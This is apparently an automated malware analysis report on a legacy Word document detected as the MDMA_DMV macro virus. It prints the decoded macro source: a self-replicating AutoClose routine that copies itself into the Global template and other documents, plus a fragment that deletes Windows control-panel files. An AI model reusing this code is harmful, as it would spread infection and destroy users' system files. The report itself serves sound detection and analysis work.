Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f6252e04e71762ed…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 29.5 KB
Created: 1980-01-04 20:22:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: d3b62c79599ca60536df0d2cb124fa43
SHA-1: 69837cf8a2fe3244ee31e64f053992a1db56956e
SHA-256: f6252e04e71762ed26332f8ac51cf98d363cceb8874f8b9f439c7872a45bd3ea
Risk score: 188

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic)

The sample exhibits the characteristics of a legacy macro virus: it carries the 'RSN MACRO VIRUS' marker and an AutoClose macro. The AutoClose subroutine attempts to install itself into the global template and, from there, to infect other documents, which is a self-propagation mechanism. The combination of legacy WordBasic macro-virus markers and the AutoClose auto-execution entry point strongly indicates malicious intent to spread.

Heuristics (4)

  • ClamAV: Doc.Trojan.MDMA-2 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.MDMA-2
  • Legacy WordBasic macro-virus markers (severity: high; rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    The OLE Word document contains legacy WordBasic auto-execution macro markers, such as AutoOpen combined with ToolsMacro/MacroFile/fileMacro/globMacro, or the names of historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Auto_Close macro (severity: low; rule: OLE_VBA_AUTOCLOSE)
    Auto_Close macro
    Matched line in script:
    Attribute VB_Name = "AutoClose"

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2962 bytes
SHA-256: a612e4926d5a8adabfb0698354e4a493839759f50b0597791fed0b9e0ffecbbe
Detection: ClamAV: Doc.Trojan.MDMA-2
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoClose"

Public Sub MAIN()
On Error Resume Next
    install
    If (WordBasic.Day(WordBasic.Now()) = 1) Then
        Select Case get_platform
            Case 1
                WordBasic.Call "infect_mac"
            Case 2
                WordBasic.Call "infect_windows"
            Case 3
                WordBasic.Call "infect_NT"
            Case 4
                WordBasic.Call "infect_95"
        End Select
        show_credits
    End If
End Sub

Private Sub install()
Dim total
Dim installed
Dim i
    On Error Resume Next
    total = WordBasic.CountMacros(0)
    installed = 0
    If total > 0 Then
        For i = 1 To total
            If WordBasic.[MacroName$](i, 0) = "AutoClose" Then
                installed = 1
            End If
        Next
    End If
    If installed = 0 Then
        WordBasic.MacroCopy WordBasic.[WindowName$]() + ":AutoClose", "Global:AutoClose", 1
    Else
        total = WordBasic.CountMacros(1)
        installed = 0
        If total > 0 Then
            For i = 1 To total
                If WordBasic.[MacroName$](i, 1) = "AutoClose" Then
                    installed = 1
                End If
            Next
        End If
        If installed = 0 Then
            WordBasic.FileSaveAs Format:=1
            WordBasic.MacroCopy "Global:AutoClose", WordBasic.[WindowName$]() + ":AutoClose", 1
        End If
    End If
End Sub

Private Function get_platform()
    On Error Resume Next
    If InStr(WordBasic.[AppInfo$](1), "Macintosh") Then
        get_platform = 1                    'MAC
    End If

    If WordBasic.[AppInfo$](9) <> "0" Then
        get_platform = 2                    'old version of windows
    End If

    If InStr(WordBasic.[GetSystemInfo$](21), "NT") Then
        get_platform = 3                  'WinNT
    End If
End Function

' [extraction garbled here: the start of the infect_* routines is not recoverable; the lines below are the tail of one of them]
    WordBasic.Kill "c:\windows\system\*.cpl"
End If
End Sub

Private Sub show_credits()
    On Error Resume Next
    WordBasic.MsgBox "You are infected with MDMA_DMV. Brought to you by MDMA (Many Delinquent Modern Anarchists).", "MDMA_DMV", 16
End Sub